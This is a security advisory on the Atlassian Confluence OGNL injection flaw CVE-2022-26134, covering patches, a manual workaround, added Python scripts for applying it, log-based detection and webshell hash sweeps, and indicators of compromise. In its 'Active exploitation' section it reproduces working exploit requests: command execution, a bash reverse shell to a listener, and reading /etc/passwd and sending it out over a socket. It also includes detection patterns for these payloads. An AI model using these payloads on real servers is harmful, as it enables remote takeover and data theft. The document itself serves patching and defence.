A remote code execution vulnerability affecting Atlassian Confluence products has been identified and assigned CVE-2022-26134. It is exploitable without authentication and is being actively exploited.
According to the initial analysis, the vulnerability is a code injection (OGNL injection) of the same type as OGNL injection vulnerabilities reported on previous occasions.
Products affected by vulnerability CVE-2022-26134
- Atlassian Confluence Server.
- Atlassian Confluence Data Center.
According to the official information published by Atlassian, all versions of Confluence Server and Data Center are affected by CVE-2022-26134.
CVE-2022-26134 Workarounds and security patches
Patch for the Atlassian Confluence vulnerability
Atlassian has released versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1, which contain a fix for this issue.
Atlassian recommends upgrading to the latest Long Term Support release. The latest version can be downloaded from the Atlassian download centre.
If it is not possible to upgrade Confluence immediately, a temporary workaround has been published:
CVE-2022-26134 Workaround
For Confluence 7.15.0 – 7.18.0
If Confluence runs in a cluster, this process needs to be repeated on each node. It is not necessary to shut down the whole cluster.
1. Shut down Confluence.
2. Download the following file (linked from the Atlassian advisory) to the Confluence server:
   xwork-1.0.3-atlassian-10.jar
3. Delete the following file from the Confluence install directory:
   <confluence-install>/confluence/WEB-INF/lib/xwork-1.0.3-atlassian-8.jar
4. Copy the downloaded xwork-1.0.3-atlassian-10.jar into:
   <confluence-install>/confluence/WEB-INF/lib/
5. Check that the permissions and ownership of xwork-1.0.3-atlassian-10.jar match the existing files in the same directory.
6. Start Confluence.
For Confluence 7.0.0 – 7.14.2
1. Shut down Confluence.
2. Download the following files (linked from the Atlassian advisory) to the Confluence server:
   xwork-1.0.3-atlassian-10.jar
   webwork-2.1.5-atlassian-4.jar
   CachedConfigurationProvider.class
3. Delete the following files from the Confluence install directory:
   <confluence-install>/confluence/WEB-INF/lib/xwork-1.0.3.6.jar
   <confluence-install>/confluence/WEB-INF/lib/webwork-2.1.5-atlassian-3.jar
4. Copy the downloaded xwork-1.0.3-atlassian-10.jar into <confluence-install>/confluence/WEB-INF/lib/
5. Copy the downloaded webwork-2.1.5-atlassian-4.jar into <confluence-install>/confluence/WEB-INF/lib/
6. Check that the permissions and ownership of both new files match the existing files in the same directory.
7. Change to the following directory: <confluence-install>/confluence/WEB-INF/classes/com/atlassian/confluence/setup
   7.1 Create a new directory called webwork.
   7.2 Copy CachedConfigurationProvider.class into:
       <confluence-install>/confluence/WEB-INF/classes/com/atlassian/confluence/setup/webwork
   7.3 Ensure the permissions and ownership are correct for:
       <confluence-install>/confluence/WEB-INF/classes/com/atlassian/confluence/setup/webwork
   7.4 Ensure the permissions and ownership are correct for:
       <confluence-install>/confluence/WEB-INF/classes/com/atlassian/confluence/setup/webwork/CachedConfigurationProvider.class
8. Start Confluence.
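As an added example (not Atlassian's own tooling), the following Python script performs the file-swap part of both workaround procedures above against a stopped Confluence instance, and then verifies the result. It infers which branch applies from the vulnerable jars present in WEB-INF/lib (an assumption made here; Atlassian keys the steps on the version number, so confirm the version first), copies ownership and permission bits from the existing jar as the advisory requires, and refuses to proceed if a downloaded file is missing so a half-applied state is not left behind. The backup directory name cve-2022-26134-backup and the branch labels are this example's choices; the file names and paths are the advisory's.

```python
"""Added example, not Atlassian's own tooling: apply the CVE-2022-26134
jar-swap workaround to a Confluence install directory and verify the result.
Assumes Confluence is stopped and that the patched files from the Atlassian
advisory were already downloaded into `downloads`."""
import os
import shutil
from pathlib import Path
from typing import Optional

LIB_REL = Path("confluence/WEB-INF/lib")
SETUP_REL = Path("confluence/WEB-INF/classes/com/atlassian/confluence/setup")
CLASS_NAME = "CachedConfigurationProvider.class"
PATCHED_XWORK = "xwork-1.0.3-atlassian-10.jar"

# File sets per version branch, as listed in the advisory steps above.
BRANCHES = {
    "7.15.0-7.18.0": {
        "remove": ["xwork-1.0.3-atlassian-8.jar"],
        "add_jars": [PATCHED_XWORK],
        "add_class": False,
    },
    "7.0.0-7.14.2": {
        "remove": ["xwork-1.0.3.6.jar", "webwork-2.1.5-atlassian-3.jar"],
        "add_jars": [PATCHED_XWORK, "webwork-2.1.5-atlassian-4.jar"],
        "add_class": True,
    },
}


def detect_branch(install: Path) -> Optional[str]:
    """Infer the branch from the vulnerable jars present (assumption of this
    example: Atlassian keys the steps on the version number, so confirm it)."""
    lib = install / LIB_REL
    for name, spec in BRANCHES.items():
        if all((lib / jar).is_file() for jar in spec["remove"]):
            return name
    return None


def _match_owner_mode(target: Path, template: os.stat_result) -> None:
    """Give `target` the ownership and permission bits of an existing file,
    i.e. the advisory's 'check that permissions and ownership match' step."""
    os.chmod(target, template.st_mode & 0o7777)
    os.chown(target, template.st_uid, template.st_gid)


def verify_workaround(install: Path) -> bool:
    """True when no vulnerable jar remains and the patched xwork jar is present."""
    lib = install / LIB_REL
    vulnerable = {jar for spec in BRANCHES.values() for jar in spec["remove"]}
    leftovers = [p.name for p in lib.glob("*.jar") if p.name in vulnerable]
    return not leftovers and (lib / PATCHED_XWORK).is_file()


def apply_workaround(install: Path, downloads: Path) -> str:
    """Perform the swap for the detected branch and return the branch name.
    Raises before touching anything if the inputs are inconsistent."""
    branch = detect_branch(install)
    if branch is None:
        raise RuntimeError("no known vulnerable xwork/webwork jars in WEB-INF/lib: "
                           "unsupported version, or workaround already applied")
    spec = BRANCHES[branch]
    lib = install / LIB_REL
    needed = list(spec["add_jars"]) + ([CLASS_NAME] if spec["add_class"] else [])
    missing = [f for f in needed if not (downloads / f).is_file()]
    if missing:
        raise FileNotFoundError(f"downloaded files missing: {missing}")

    template = (lib / spec["remove"][0]).stat()  # owner/mode of an existing lib jar
    backup = install / "cve-2022-26134-backup"   # backup dir name chosen for this example
    backup.mkdir(exist_ok=True)
    for jar in spec["remove"]:  # "delete" the old jars, keeping a copy for rollback
        shutil.move(str(lib / jar), str(backup / jar))
    for jar in spec["add_jars"]:
        dst = lib / jar
        shutil.copyfile(downloads / jar, dst)
        _match_owner_mode(dst, template)
    if spec["add_class"]:  # steps 7.1-7.4 of the 7.0.0-7.14.2 procedure
        setup_dir = install / SETUP_REL
        webwork_dir = setup_dir / "webwork"
        webwork_dir.mkdir(exist_ok=True)
        _match_owner_mode(webwork_dir, setup_dir.stat())
        dst = webwork_dir / CLASS_NAME
        shutil.copyfile(downloads / CLASS_NAME, dst)
        _match_owner_mode(dst, template)
    if not verify_workaround(install):
        raise RuntimeError("post-swap verification failed; inspect WEB-INF/lib")
    return branch


if __name__ == "__main__":
    import sys
    print("applied branch", apply_workaround(Path(sys.argv[1]), Path(sys.argv[2])))
```

Run it as root (or as the Confluence service user) with the install directory and the download directory as arguments, once per cluster node, between the shutdown and start steps. The verify_workaround check is also useful on its own afterwards, and as a fleet-wide audit that no node still carries one of the vulnerable jar names.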
Additional mitigations
The Atlassian security team has defined the following workarounds:
- Disable or restrict access to Confluence Server and Data Center instances exposed to the Internet.
- If that is not possible, define WAF rules blocking URLs that contain the sequence ${. The rule must be evaluated against the decoded URL: in the exploit requests shown below the sequence is sent percent-encoded as %24%7B.
Server hardening should also be considered: verify that Confluence Server runs as a non-privileged user, and that the server operating system is fully patched and has been restarted so that it is running a kernel without known vulnerabilities. Similarly, deploying an EDR agent can help detect or prevent exploitation and any subsequent privilege escalation.
Given that the technical details of the exploit are already known and a patch exists, vulnerable systems need to be updated now.
Active exploitation of CVE-2022-26134
According to Volexity's analysis of an incident response engagement over the US Memorial Day weekend, malicious activity was identified affecting Atlassian Confluence Server. Rapid7 has since verified the analysis and published several example exploit requests, reproduced below.
Proof of concept: command execution (creates /tmp/pwned)
curl -v https://10.0.0.28:8090/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/pwned%22%29%7D/
The server evaluates the URL-decoded path as the following OGNL expression:
${@java.lang.Runtime@getRuntime().exec("touch /tmp/pwned")}
Command execution
The following request executes the whoami command and returns the result of the command in the X-Cmd-Response header.
curl -v https://10.0.0.28:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/
This payload is decoded as follows:
${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("whoami").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
Reverse Shell
curl -v https://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/
Again, the decoded expression is:
${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash','-c','bash -i >& /dev/tcp/10.0.0.28/1270 0>&1').start()")}
Arbitrary file read: /etc/passwd
curl -v https://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22var%20data%20%3D%20new%20java.lang.String%28java.nio.file.Files.readAllBytes%28java.nio.file.Paths.get%28%27/etc/passwd%27%29%29%29%3Bvar%20sock%20%3D%20new%20java.net.Socket%28%2710.0.0.28%27%2C%201270%29%3B%20var%20output%20%3D%20new%20java.io.BufferedWriter%28new%20java.io.OutputStreamWriter%28sock.getOutputStream%28%29%29%29%3B%20output.write%28data%29%3B%20output.flush%28%29%3B%20sock.close%28%29%3B%22%29%7D/
Decoded, this sends the file contents to the attacker's listener over a TCP socket:
${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("var data = new java.lang.String(java.nio.file.Files.readAllBytes(java.nio.file.Paths.get('/etc/passwd')));var sock = new java.net.Socket('10.0.0.28', 1270); var output = new java.io.BufferedWriter(new java.io.OutputStreamWriter(sock.getOutputStream())); output.write(data); output.flush(); sock.close();")}
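As an added example (not code from Volexity, Rapid7 or Atlassian), the detection logic below applies the ${ check from the WAF guidance in the mitigations section to web access-log entries and extends it with the Java/OGNL markers visible in the requests above. The request path is percent-decoded repeatedly, so a double-encoded %2524%257B does not slip past a literal ${ match the way it would past a WAF rule applied to the raw URL. The log format (Tomcat/Apache common log layout), the indicator names and the sample log lines are all constructed for this example; the two malicious paths are the page's first request and a double-encoded variant of the ScriptEngineManager pattern.

```python
"""Added example, not Volexity's or Rapid7's tooling: flag CVE-2022-26134 exploit
attempts in Tomcat/Apache-style access logs. The request path is URL-decoded
repeatedly (so a double-encoded %2524%257B does not slip past a literal `${`
check) and matched against the OGNL/Java markers seen in the payloads above.
The log lines below are constructed for this example."""
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote

# Common log format as written by Tomcat's AccessLogValve (assumed layout):
# host ident user [time] "METHOD path PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Markers taken from the exploit requests on this page; the names are labels
# chosen for this example.
MARKERS = [
    ("java-runtime-exec", re.compile(r"@java\.lang\.Runtime@")),
    ("script-engine", re.compile(r"javax\.script\.ScriptEngineManager")),
    ("process-builder", re.compile(r"java\.lang\.ProcessBuilder")),
    ("response-header-exfil", re.compile(r"ServletActionContext@getResponse")),
    ("commons-io-read", re.compile(r"org\.apache\.commons\.io\.IOUtils")),
]


def decode_fully(value: str, max_rounds: int = 5) -> str:
    """Percent-decode until the string stops changing, capped so a
    pathological input cannot keep us looping."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(path: str) -> Tuple[str, List[str]]:
    """Return the decoded path and the list of indicators it triggers."""
    decoded = decode_fully(path)
    hits = []
    if "${" in decoded:  # the sequence Atlassian's WAF guidance keys on
        hits.append("ognl-expression")
    for name, pattern in MARKERS:
        if pattern.search(decoded):
            hits.append(name)
    return decoded, hits


def scan_access_log(lines) -> List[Dict[str, object]]:
    """Parse each line and keep those whose path carries at least one indicator."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed layout
        decoded, hits = classify(m["path"])
        if hits:
            findings.append({"ip": m["ip"], "time": m["ts"], "status": m["status"],
                             "decoded_path": decoded, "indicators": hits})
    return findings


# Constructed sample: a benign login, the page's `touch /tmp/pwned` request,
# a double-encoded ScriptEngineManager probe, and an unrelated API call.
SAMPLE_LOG = [
    '203.0.113.5 - - [02/Jun/2022:10:00:01 +0000] "GET /login.action HTTP/1.1" 200 5123',
    '203.0.113.5 - - [02/Jun/2022:10:00:02 +0000] "GET /%24%7B%40java.lang.Runtime%40getRuntime'
    '%28%29.exec%28%22touch%20/tmp/pwned%22%29%7D/ HTTP/1.1" 302 0',
    '203.0.113.7 - - [02/Jun/2022:10:00:03 +0000] "GET /%2524%257Bnew%2520javax.script.'
    'ScriptEngineManager%2528%2529%257D/ HTTP/1.1" 302 0',
    '198.51.100.9 - - [02/Jun/2022:10:00:04 +0000] "POST /rest/api/content HTTP/1.1" 200 77',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding["ip"], finding["indicators"], finding["decoded_path"])
```

Two caveats apply. An access log only records the request line, so this catches payloads carried in the URL path, which is where the requests above place them; it says nothing about what the payload did once executed, which is why the host-side artefacts listed under "Attacks in progress" still need to be checked. And the plain ${ match will also fire on any legitimate request that happens to contain that sequence, so treat it as a triage signal and rely on the more specific Java markers to prioritise.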
Attacks in progress
Analysis of CVE-2022-26134 in the context of the current active exploitation campaigns has shown the following activity:
- Initial code execution and creation of child processes that invoke different shells (bash and python).
- JSP webshells being written to disk.
- Overwriting of existing Confluence Server resources to incorporate a webshell, specifically the following file:
  <confluence-root>/confluence/noop.jsp
- Deployment of other webshells to ensure persistent access to compromised systems, including a variant of the JSP China Chopper webshell, which has previously been used by various malicious actors. [1][2][3]
- Deployment of the open source Behinder implant, which provides a memory-resident webshell (no need to write to disk) and can interact with Meterpreter and Cobalt Strike.
The CVE-2022-26134 vulnerability has been added to the catalog of known exploited vulnerabilities compiled by the US government agency CISA (Cybersecurity & Infrastructure Security Agency).
IOCs
The Volexity threat-intel repository listed in the references includes indicators of compromise (IP addresses involved in the current exploitation campaign) as well as YARA rules.
Information of the webshells deployed in the context of the analyzed campaign is shown below:
- Modified noop.jsp resource:
  Filename  | noop.jsp
  File size | 537 bytes
  MD5       | f8df4dd46f02dc86d37d46cf4793e036
  SHA1      | 4c02c3a150de6b70d6fca584c29888202cc1deef
- JSP China Chopper webshell variant:
  Filename  | *.jsp
  File size | 8624 bytes
  MD5       | ea18fb65d92e1f0671f23372bacf60e7
  SHA1      | 80b327ec19c7d14cc10511060ed3a4abffc821af
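As an added example (not tooling from the campaign reports), the script below sweeps a Confluence install tree for JSP files whose MD5 or SHA-1 matches the two webshell indicators above, and additionally lists any JSP file modified after a baseline timestamp (for instance the time the instance was last patched) so that a webshell not covered by the known hashes still surfaces for review. The hashes are the page's IOCs; the labels, the function names and the baseline-timestamp idea are this example's.

```python
"""Added example, not from the campaign reports: sweep a Confluence install tree
for JSP files whose MD5/SHA-1 matches the webshell indicators in the table
above, and list JSP files modified after a chosen timestamp for manual review.
The hashes are the page's IOCs; the labels are this example's."""
import hashlib
from pathlib import Path
from typing import Dict, List, Optional, Tuple

KNOWN_BAD = {
    "f8df4dd46f02dc86d37d46cf4793e036": "modified noop.jsp (MD5)",
    "4c02c3a150de6b70d6fca584c29888202cc1deef": "modified noop.jsp (SHA1)",
    "ea18fb65d92e1f0671f23372bacf60e7": "China Chopper JSP variant (MD5)",
    "80b327ec19c7d14cc10511060ed3a4abffc821af": "China Chopper JSP variant (SHA1)",
}


def file_digests(path: Path) -> Tuple[str, str]:
    """Return (md5, sha1) hex digests, streaming so large files are not read at once."""
    md5, sha1 = hashlib.md5(), hashlib.sha1()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            md5.update(chunk)
            sha1.update(chunk)
    return md5.hexdigest(), sha1.hexdigest()


def sweep_jsp(root: Path, modified_since: Optional[float] = None,
              known_bad: Dict[str, str] = KNOWN_BAD) -> List[Dict[str, object]]:
    """Walk `root` (e.g. <confluence-install>/confluence) for *.jsp files and
    report those matching an IOC hash or modified after `modified_since`
    (a Unix timestamp chosen by the operator, such as the last patch time)."""
    findings = []
    for path in sorted(Path(root).rglob("*.jsp")):
        md5, sha1 = file_digests(path)
        reasons = []
        label = known_bad.get(md5) or known_bad.get(sha1)
        if label:
            reasons.append("ioc-hash: " + label)
        if modified_since is not None and path.stat().st_mtime > modified_since:
            reasons.append("modified-after-baseline")
        if reasons:
            findings.append({"path": str(path), "md5": md5, "sha1": sha1,
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    import sys
    baseline = float(sys.argv[2]) if len(sys.argv) > 2 else None
    for finding in sweep_jsp(Path(sys.argv[1]), baseline):
        print(finding["path"], finding["reasons"], finding["md5"])
```

Two limits are worth keeping in mind when reading the output. Modification times are trivially forged, so the baseline check is a prompt for review, not evidence of cleanliness; comparing noop.jsp against the copy shipped in a pristine install of the same Confluence version is the stronger check for the overwrite described above. And because the Behinder implant described above runs memory-resident without touching disk, a clean disk sweep does not rule out compromise; process and memory inspection (or the EDR agent recommended in the mitigations) is needed for that.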
References
- Zero-Day Exploitation of Atlassian Confluence – https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/
- Security advisory issued by Atlassian – https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
- Security Alert CVE-2022-26134 issued by BugAlert – https://bugalert.org/content/notices/2022-06-02-confluence.html?src=tw
- IOCs – https://github.com/volexity/threat-intel/tree/main/2022/2022-06-02%20Active%20Exploitation%20Of%20Confluence%200-day/indicators
- SIGMA rules – https://github.com/SigmaHQ/sigma/pull/3087/commits/777b123ad0e673e30eb8b6c566dc353b338f0e87
- CISA – Known Exploited vulnerability catalog – https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog
- China Chopper Webshell – https://attack.mitre.org/software/S0020/
- Rapid7 analysis – https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134